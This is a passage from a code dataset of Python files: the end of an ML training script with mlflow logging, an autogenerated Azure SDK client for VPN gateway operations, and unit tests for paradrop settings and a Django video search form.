train_test_split(\n X, y, test_size=0.8, random_state=SEED)\n\n # Track hash of data & split\n data_hash = hashlib.md5()\n for df in [X_train, X_test, y_train, y_test]:\n data_hash.update(df)\n data_hash = data_hash.hexdigest()\n\n clf = RandomForestClassifier(**cfg, random_state=SEED)\n clf.fit(X_train, y_train)\n preds = clf.predict(X_test)\n\n scores = classification_report(y_test, preds, output_dict=True)\n\n df = pd.json_normalize(scores, sep='_')\n df = df.to_dict(orient='records')[0]\n\n with mlflow.start_run():\n mlflow.log_params(cfg)\n mlflow.log_param('data_hash', data_hash)\n mlflow.log_metrics(df)\n print(df['macro avg_f1-score'])\n\n\nif __name__ == '__main__':\n cfg = {'n_estimators': 500,\n 'max_depth': 25,\n 'min_samples_split': 2,\n 'min_samples_leaf': 1,\n }\n train(cfg)\n"} {"ext": "py", "sha": "1a2f869ec2c812dfb0a9d1d33b95a16c250ea5fe", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import TYPE_CHECKING\nimport warnings\n\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.paging import ItemPaged\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import HttpRequest, HttpResponse\nfrom azure.core.polling import LROPoller, NoPolling, PollingMethod\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\nfrom azure.mgmt.core.polling.arm_polling import ARMPolling\n\nfrom .. import models\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union\n\n T = TypeVar('T')\n ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]\n\nclass VpnGatewaysOperations(object):\n \"\"\"VpnGatewaysOperations operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~azure.mgmt.network.v2020_03_01.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer):\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n def get(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> \"models.VpnGateway\"\n \"\"\"Retrieves the details of a virtual wan vpn gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VpnGateway, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self.get.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _create_or_update_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.VpnGateway\"\n **kwargs # type: Any\n ):\n # type: (...) -> \"models.VpnGateway\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self._create_or_update_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')\n body_content_kwargs['content'] = body_content\n request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 201]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if response.status_code == 200:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if response.status_code == 201:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def begin_create_or_update(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.VpnGateway\"\n **kwargs # type: Any\n ):\n # type: (...) -> LROPoller[\"models.VpnGateway\"]\n \"\"\"Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :param vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan vpn\n gateway.\n :type vpn_gateway_parameters: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.VpnGateway]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._create_or_update_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n vpn_gateway_parameters=vpn_gateway_parameters,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def update_tags(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n vpn_gateway_parameters, # type: \"models.TagsObject\"\n **kwargs # type: Any\n ):\n # type: (...) -> \"models.VpnGateway\"\n \"\"\"Updates virtual wan vpn gateway tags.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.\n :type vpn_gateway_parameters: ~azure.mgmt.network.v2020_03_01.models.TagsObject\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: VpnGateway, or the result of cls(response)\n :rtype: ~azure.mgmt.network.v2020_03_01.models.VpnGateway\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n content_type = kwargs.pop(\"content_type\", \"application/json\")\n accept = \"application/json\"\n\n # Construct URL\n url = self.update_tags.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Content-Type'] = self._serialize.header(\"content_type\", content_type, 'str')\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n body_content_kwargs = {} # type: Dict[str, Any]\n body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')\n body_content_kwargs['content'] = body_content\n request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _delete_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> None\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._delete_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.delete(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202, 204]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n if cls:\n return cls(pipeline_response, None, {})\n\n _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def begin_delete(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> LROPoller[None]\n \"\"\"Deletes a virtual wan vpn gateway.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either None or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[None]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[None]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._delete_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n if cls:\n return cls(pipeline_response, None, {})\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore\n\n def _reset_initial(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> Optional[\"models.VpnGateway\"]\n cls = kwargs.pop('cls', None) # type: ClsType[Optional[\"models.VpnGateway\"]]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n # Construct URL\n url = self._reset_initial.metadata['url'] # type: ignore\n path_format_arguments = {\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n 'gatewayName': self._serialize.url(\"gateway_name\", gateway_name, 'str'),\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.post(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200, 202]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n deserialized = None\n if response.status_code == 200:\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n _reset_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore\n\n def begin_reset(\n self,\n resource_group_name, # type: str\n gateway_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> LROPoller[\"models.VpnGateway\"]\n \"\"\"Resets the primary of the vpn gateway in the specified resource group.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :param gateway_name: The name of the gateway.\n :type gateway_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :keyword str continuation_token: A continuation token to restart a poller from a saved state.\n :keyword polling: True for ARMPolling, False for no polling, or a\n polling object for personal polling strategy\n :paramtype polling: bool or ~azure.core.polling.PollingMethod\n :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.\n :return: An instance of LROPoller that returns either VpnGateway or the result of cls(response)\n :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_03_01.models.VpnGateway]\n :raises ~azure.core.exceptions.HttpResponseError:\n \"\"\"\n polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.VpnGateway\"]\n lro_delay = kwargs.pop(\n 'polling_interval',\n self._config.polling_interval\n )\n cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]\n if cont_token is None:\n raw_result = self._reset_initial(\n resource_group_name=resource_group_name,\n gateway_name=gateway_name,\n cls=lambda x,y,z: x,\n **kwargs\n )\n\n kwargs.pop('error_map', None)\n kwargs.pop('content_type', None)\n\n def get_long_running_output(pipeline_response):\n deserialized = self._deserialize('VpnGateway', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n return deserialized\n\n if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, **kwargs)\n elif polling is False: polling_method = NoPolling()\n else: polling_method = polling\n if cont_token:\n return LROPoller.from_continuation_token(\n polling_method=polling_method,\n continuation_token=cont_token,\n client=self._client,\n deserialization_callback=get_long_running_output\n )\n else:\n return LROPoller(self._client, raw_result, get_long_running_output, polling_method)\n begin_reset.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore\n\n def list_by_resource_group(\n self,\n resource_group_name, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> Iterable[\"models.ListVpnGatewaysResult\"]\n \"\"\"Lists all the VpnGateways in a resource group.\n\n :param resource_group_name: The resource group name of the VpnGateway.\n :type resource_group_name: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)\n :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.ListVpnGatewaysResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.ListVpnGatewaysResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list_by_resource_group.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n 'resourceGroupName': self._serialize.url(\"resource_group_name\", resource_group_name, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n def extract_data(pipeline_response):\n deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, iter(list_of_elem)\n\n def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return ItemPaged(\n get_next, extract_data\n )\n list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'} # type: ignore\n\n def list(\n self,\n **kwargs # type: Any\n ):\n # type: (...) -> Iterable[\"models.ListVpnGatewaysResult\"]\n \"\"\"Lists all the VpnGateways in a subscription.\n\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)\n :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_03_01.models.ListVpnGatewaysResult]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[\"models.ListVpnGatewaysResult\"]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n api_version = \"2020-03-01\"\n accept = \"application/json\"\n\n def prepare_request(next_link=None):\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n if not next_link:\n # Construct URL\n url = self.list.metadata['url'] # type: ignore\n path_format_arguments = {\n 'subscriptionId': self._serialize.url(\"self._config.subscription_id\", self._config.subscription_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n query_parameters['api-version'] = self._serialize.query(\"api_version\", api_version, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n else:\n url = next_link\n query_parameters = {} # type: Dict[str, Any]\n request = self._client.get(url, query_parameters, header_parameters)\n return request\n\n def extract_data(pipeline_response):\n deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)\n list_of_elem = deserialized.value\n if cls:\n list_of_elem = cls(list_of_elem)\n return deserialized.next_link or None, iter(list_of_elem)\n\n def get_next(next_link=None):\n request = prepare_request(next_link)\n\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response, error_format=ARMErrorFormat)\n\n return pipeline_response\n\n return ItemPaged(\n get_next, extract_data\n )\n list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore\n"} {"ext": "py", "sha": "1a2f86cf170f003f6765598b13c57e6737eec197", "content": "import os\nimport shutil\n\nfrom nose.tools import assert_raises\nfrom paradrop.lib.utils import pdos, pdosq\nfrom paradrop.base import nexus, settings\n\n\nclass TestingNexus(nexus.NexusBase):\n pass\n\n\ndef setup():\n settings.loadSettings(mode=\"unittest\")\n\n\ndef teardown():\n pdos.remove(settings.CONFIG_HOME_DIR)\n\n\n###############################################################################\n# Settings Assignment, Paths\n###############################################################################\n\n\ndef testMetaAssignment():\n nex = TestingNexus()\n assert nex.info.version == 1\n\n\ndef testConfigLoadingEmpty():\n nex = TestingNexus()\n assert nex.info.pdid == None\n\n\ndef testConfigLoadingExisting():\n contents = dict(pdid='pd.damouse.aardvark', version=1, pdserver='http://paradrop.org', wampRouter='ws://paradrop.org:9080/ws')\n nexus.writeYaml(contents, settings.CONFIG_FILE)\n\n nex = TestingNexus()\n assert nex.info.pdid == 'pd.damouse.aardvark'\n assert nex.info.pdserver == 'http://paradrop.org'\n assert nex.info.wampRouter == 'ws://paradrop.org:9080/ws'\n pdos.remove(settings.CONFIG_FILE)\n\n\n###############################################################################\n# AttrWrapper\n###############################################################################\n\ndef testWrapperDoesntAllowChanges():\n wrapper = nexus.AttrWrapper()\n\n wrapper.a = 1\n assert wrapper.a == 1\n\n def s():\n wrapper._lock()\n wrapper.a = 2\n\n assert_raises(AttributeError, s)\n\n###############################################################################\n# Setings Changes\n###############################################################################\n\n\ndef testSaveCallbackTriggered():\n class Receiver:\n\n def __init__(self):\n self.received = False\n\n def onChange(self, k, v):\n self.received = True\n\n rec = Receiver()\n\n wrapper = nexus.AttrWrapper()\n wrapper.a = 1\n\n wrapper.setOnChange(rec.onChange)\n\n wrapper.a = 2\n\n assert wrapper.a == 2\n assert rec.received == True\n\n\ndef testSaveUpdatesYaml():\n nex = TestingNexus()\n nex.info.a = 1\n\n dic = pdosq.read_yaml_file(settings.CONFIG_FILE)\n assert dic['a'] == 1\n\n"} {"ext": "py", "sha": "1a2f8873b884c3ec3c3e0535fbe94b19ca1bf26e", "content": "from django.core.exceptions import ValidationError\nfrom django.test.client import RequestFactory\n\nfrom mock import patch\nfrom nose.tools import assert_raises, eq_, ok_\nfrom waffle import Flag\n\nfrom flicks.base.regions import NORTH_AMERICA\nfrom flicks.base.tests import TestCase\nfrom flicks.videos.forms import VideoSearchForm\nfrom flicks.videos.search import AUTOCOMPLETE_FIELDS\n\n\nclass VideoSearchFormTests(TestCase):\n def setUp(self):\n super(VideoSearchFormTests, self).setUp()\n self.factory = RequestFactory()\n self.request = self.factory.get('/')\n\n def test_popular_sort_include(self):\n \"\"\"If the voting-end waffle flag is not set, include the popular option for sorting.\"\"\"\n Flag.objects.create(name='voting-end', everyone=False)\n form = VideoSearchForm(self.request)\n ok_('popular' in [c[0] for c in form.fields['sort'].choices])\n\n def test_popular_sort_exclude(self):\n \"\"\"If the voting-end waffle flag is set, do not include the popular option for sorting.\"\"\"\n Flag.objects.create(name='voting-end', everyone=True)\n form = VideoSearchForm(self.request)\n ok_('popular' not in [c[0] for c in form.fields['sort'].choices])\n\n @patch('flicks.videos.forms.search_videos')\n def test_valid_search(self, search_videos):\n form = VideoSearchForm(self.request, {\n 'query': 'asdf',\n 'field': 'title',\n 'region': NORTH_AMERICA,\n 'sort': 'popular'\n })\n\n eq_(form.perform_search(), search_videos.return_value)\n search_videos.assert_called_with(\n query='asdf',\n fields=AUTOCOMPLETE_FIELDS['title'],\n region=NORTH_AMERICA,\n sort='popular'\n )\n\n @patch('flicks.videos.forms.search_videos')\n def test_empty_field_passes_none(self, search_videos):\n \"\"\"If the field isn't specified, pass None to the fields parameter.\"\"\"\n form = VideoSearchForm(self.request, {\n 'query': 'asdf',\n 'region': NORTH_AMERICA,\n 'sort': 'popular'\n })\n\n eq_(form.perform_search(), search_videos.return_value)\n search_videos.assert_called_with(query='asdf', fields=None,\n region=NORTH_AMERICA, sort='popular')\n\n def test_invalid_form(self):\n \"\"\"If the form fails validation, throw a ValidationError.\"\"\"\n form = VideoSearchForm(self.request, {\n 'region': -5,\n 'sort': 'invalid'\n })\n\n with assert_raises(ValidationError):\n form.perform_search()\n\n def test_clean_no_query(self):\n \"\"\"\n If no search query is specified, do not alter the sort value or\n choices.\n \"\"\"\n form = VideoSearchForm(self.request, {'region': NORTH_AMERICA, 'sort': 'title'})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'title')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' in choice_values)\n\n def test_clean_query(self):\n \"\"\"\n If a search query is specified, remove the random option from the sort\n choices and, if the sort is currently set to random, switch to title\n sort.\n \"\"\"\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': ''})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'title')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' not in choice_values)\n\n # Check that sort is preserved if it is not random.\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': 'popular'})\n form.full_clean()\n\n eq_(form.cleaned_data['sort'], 'popular')\n choice_values = zip(*form.fields['sort'].choices)[0]\n ok_('' not in choice_values)\n\n def test_invalid_sort(self):\n \"\"\"\n An invalid value for sort should not break clean.\n\n Regression test for an issue where a user was attempting to break Flicks by submitting a\n bunch of invalid values for sort.\n \"\"\"\n form = VideoSearchForm(self.request, {'query': 'blah', 'sort': 'invalid'})\n form.full_clean()\n eq_(form.is_valid(), False)\n"} {"ext": "py", "sha": "1a2f88a032b687e865973285e2c7feb45eb8f216", "content": "from abc import ABC, abstractmethod\nimport os.path\nimport logging\nfrom exceptions import UnknownCommandError, FailedCommandError\nfrom 